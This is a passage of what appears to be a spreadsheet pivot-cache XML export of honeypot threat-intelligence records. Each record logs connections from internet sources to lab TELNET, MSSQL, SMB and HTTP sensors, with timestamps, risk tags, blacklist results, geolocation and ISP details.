    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="MTNL Mumbai"/>
    <s v="business"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="None"/>
    <s v="MTNL"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb6:7297"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3127"/>
    <x v="3127"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T17:19:11"/>
    <d v="2025-04-03T11:06:13"/>
    <d v="2025-04-04T17:19:11"/>
    <n v="6"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H43"/>
    <s v="1433&amp;&amp;445"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="NA"/>
    <s v="12.9719"/>
    <s v="77.5937"/>
    <s v="24560"/>
    <s v="Bharti Airtel Limited"/>
    <s v="Bharti Airtel"/>
    <s v="residential"/>
    <s v="Bharti Airtel Ltd."/>
    <s v="2006-12-19"/>
    <s v="ABTS-KK-DSL-9102-blr"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (122.172.81.147,15392)}&amp;&amp;{Data_SMB:Incoming connection (122.172.81.147,6515)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7aac:5193"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3128"/>
    <x v="3128"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T17:18:17"/>
    <d v="2025-04-04T17:18:17"/>
    <d v="2025-04-04T17:18:17"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="MTNL Mumbai"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb8:3f41"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3129"/>
    <x v="3129"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T17:15:53"/>
    <d v="2025-04-04T17:15:53"/>
    <d v="2025-04-04T17:15:53"/>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3d03:76b5"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3130"/>
    <x v="3130"/>
    <s v="NA&amp;&amp;123203064187.ctinets.com"/>
    <x v="0"/>
    <d v="2025-04-04T17:14:43"/>
    <d v="2025-03-27T07:34:17"/>
    <d v="2025-04-04T17:14:43"/>
    <n v="68"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="HK"/>
    <s v="Hong Kong"/>
    <s v="NKT"/>
    <s v="Kwai Tsing"/>
    <s v="NA"/>
    <s v="Kwai Chung"/>
    <s v="1819595"/>
    <s v="NA"/>
    <s v="22.3702"/>
    <s v="114.13"/>
    <s v="9269"/>
    <s v="Hong Kong Broadband Network Ltd"/>
    <s v="Hong Kong Broadband Network Ltd"/>
    <s v="residential"/>
    <s v="Hong Kong Broadband Network Ltd"/>
    <s v="2006-12-18"/>
    <s v="HKBN"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7bcb:40bb"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3131"/>
    <x v="3131"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T17:11:53"/>
    <d v="2024-12-28T17:42:00"/>
    <d v="2025-04-04T17:11:53"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H38"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="27"/>
    <s v="Daegu"/>
    <s v="Nam-gu"/>
    <s v="Bongdeok-dong"/>
    <s v="8692253"/>
    <s v="NA"/>
    <s v="35.8293"/>
    <s v="128.596"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="Kornet"/>
    <s v="2004-08-02"/>
    <s v="KORNET"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b19:e0c6"/>
    <s v="None"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3132"/>
    <x v="3132"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T17:03:54"/>
    <d v="2025-04-04T17:03:54"/>
    <d v="2025-04-04T17:03:54"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="corporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75e9:bc78"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3133"/>
    <x v="3133"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T16:53:29"/>
    <d v="2025-03-19T19:33:57"/>
    <d v="2025-04-04T16:53:29"/>
    <n v="35"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;37163"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="MTNL Mumbai"/>
    <s v="business"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="2004-11-30"/>
    <s v="MTNL"/>
    <s v="None"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb6:9a7b"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3134"/>
    <x v="3134"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T16:48:21"/>
    <d v="2025-04-04T16:48:21"/>
    <d v="2025-04-04T16:48:21"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="MY"/>
    <s v="Malaysia"/>
    <s v="14"/>
    <s v="Kuala Lumpur"/>
    <s v="WP. Kuala Lumpur"/>
    <s v="Kuala Lumpur (Kuala Lumpur City Centre)"/>
    <s v="1735161"/>
    <s v="50088"/>
    <s v="3.15823"/>
    <s v="101.713"/>
    <s v="9534"/>
    <s v="MAXIS-AS1-AP"/>
    <s v="Maxis Broadband Sdn.Bhd"/>
    <s v="consumer"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:71d2:1523"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3135"/>
    <x v="3135"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T16:46:40"/>
    <d v="2025-04-04T16:44:25"/>
    <d v="2025-04-04T16:46:40"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="TN"/>
    <s v="Tamil Nadu"/>
    <s v="Namakkal"/>
    <s v="Komarapalayam"/>
    <s v="8223943"/>
    <s v="637209"/>
    <s v="11.4363"/>
    <s v="77.7232"/>
    <s v="58898"/>
    <s v="Rainbow communications India Pvt Ltd"/>
    <s v="Rainbow communications India Pvt Ltd"/>
    <s v="business"/>
    <s v="Rainbow communications India Pvt Ltd"/>
    <s v="2014-07-11"/>
    <s v="RAINBOWISP"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:a335:ce62"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3136"/>
    <x v="3136"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T16:43:38"/>
    <d v="2025-04-04T16:41:46"/>
    <d v="2025-04-04T16:43:38"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="TN"/>
    <s v="Tamil Nadu"/>
    <s v="Coimbatore"/>
    <s v="Sirumugai"/>
    <s v="1256027"/>
    <s v="641302"/>
    <s v="11.3214"/>
    <s v="77.0052"/>
    <s v="45609"/>
    <s v="Bharti Airtel Limited"/>
    <s v="Bharti Airtel Limited"/>
    <s v="cellular"/>
    <s v="Bharti Airtel Limited"/>
    <s v="2009-05-11"/>
    <s v="BHARTI-MO-IN"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6ee0:512d"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3137"/>
    <x v="3137"/>
    <s v="n11649199208.netvigator.com"/>
    <x v="0"/>
    <d v="2025-04-04T16:40:21"/>
    <d v="2025-04-04T16:38:19"/>
    <d v="2025-04-04T16:40:21"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="HK"/>
    <s v="Hong Kong"/>
    <s v="KYT"/>
    <s v="Yau Tsim Mong"/>
    <s v="NA"/>
    <s v="Tai Kok Tsui"/>
    <s v="1818721"/>
    <s v="NA"/>
    <s v="22.3198"/>
    <s v="114.162"/>
    <s v="4760"/>
    <s v="PCCW IMS Limited"/>
    <s v="Hong Kong Telecommunications (HKT) Limited Mass Internet"/>
    <s v="business"/>
    <s v="Hong Kong Telecommunications (HKT) Limited"/>
    <s v="2007-03-16"/>
    <s v="NETVIGATOR"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="1996-02-09 05:00:00"/>
    <s v="2026-02-10 05:00:00"/>
    <s v="2025-02-06 06:38:39"/>
    <s v="['NS4.NETVIGATOR.COM', 'NS5.NETVIGATOR.COM']"/>
    <s v="CSC Corporate Domains, Inc."/>
    <s v="['clientTransferProhibited https://icann.org/epp#clientTransferProhibited', 'clientTransferProhibited http://www.icann.org/epp#clientTransferProhibited']"/>
    <s v="Domain Administrator"/>
    <x v="24"/>
    <s v="NA"/>
    <s v="RM902, 9F East Exchange Tower 38-40 Leighton Road"/>
    <s v="::ffff:7431:c7d0"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3138"/>
    <x v="3138"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T16:25:30"/>
    <d v="2025-04-04T13:36:01"/>
    <d v="2025-04-04T16:25:30"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H43"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2007-08-01"/>
    <s v="BB-Multiplay-General"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75d8:141"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3139"/>
    <x v="3139"/>
    <s v="220-134-152-107.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-04T16:12:36"/>
    <d v="2025-04-04T06:39:42"/>
    <d v="2025-04-04T16:12:36"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_PJL_H24"/>
    <s v="23&amp;&amp;9100"/>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one"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dc86:986b"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3140"/>
    <x v="3140"/>
    <s v="122-117-95-52.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-04T16:01:09"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-04T16:01:09"/>
    <n v="515"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_DNS_H32&amp;&amp;SMA-LAB_MT-CPA_H23&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_HTTP_H5&amp;&amp;SMA-LAB_MT-CPA_H11&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H43&amp;&amp;SMA-LAB_MT-CPA_H43"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;80&amp;&amp;53&amp;&amp;38705&amp;&amp;56680&amp;&amp;58949&amp;&amp;59042&amp;&amp;9100&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NA&amp;&amp;connection&amp;&amp;login&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '109.123.229.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7a75:5f34"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3141"/>
    <x v="3141"/>
    <s v="NA&amp;&amp;114-33-28-148.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-04T16:00:57"/>
    <d v="2024-12-25T06:10:25"/>
    <d v="2025-04-04T16:00:57"/>
    <n v="233"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H11"/>
    <s v="23&amp;&amp;58285&amp;&amp;NA"/>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NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7221:1c94"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3142"/>
    <x v="3142"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T15:59:20"/>
    <d v="2025-04-04T15:59:20"/>
    <d v="2025-04-04T15:59:20"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="JH"/>
    <s v="Jharkhand"/>
    <s v="Ranchi"/>
    <s v="Ranchi"/>
    <s v="1258526"/>
    <s v="NA"/>
    <s v="23.3432"/>
    <s v="85.3094"/>
    <s v="45609"/>
    <s v="BHARTI-MOBILITY-AS-AP"/>
    <s v="Bharti Airtel Limited"/>
    <s v="consumer"/>
    <s v="Bcl West"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
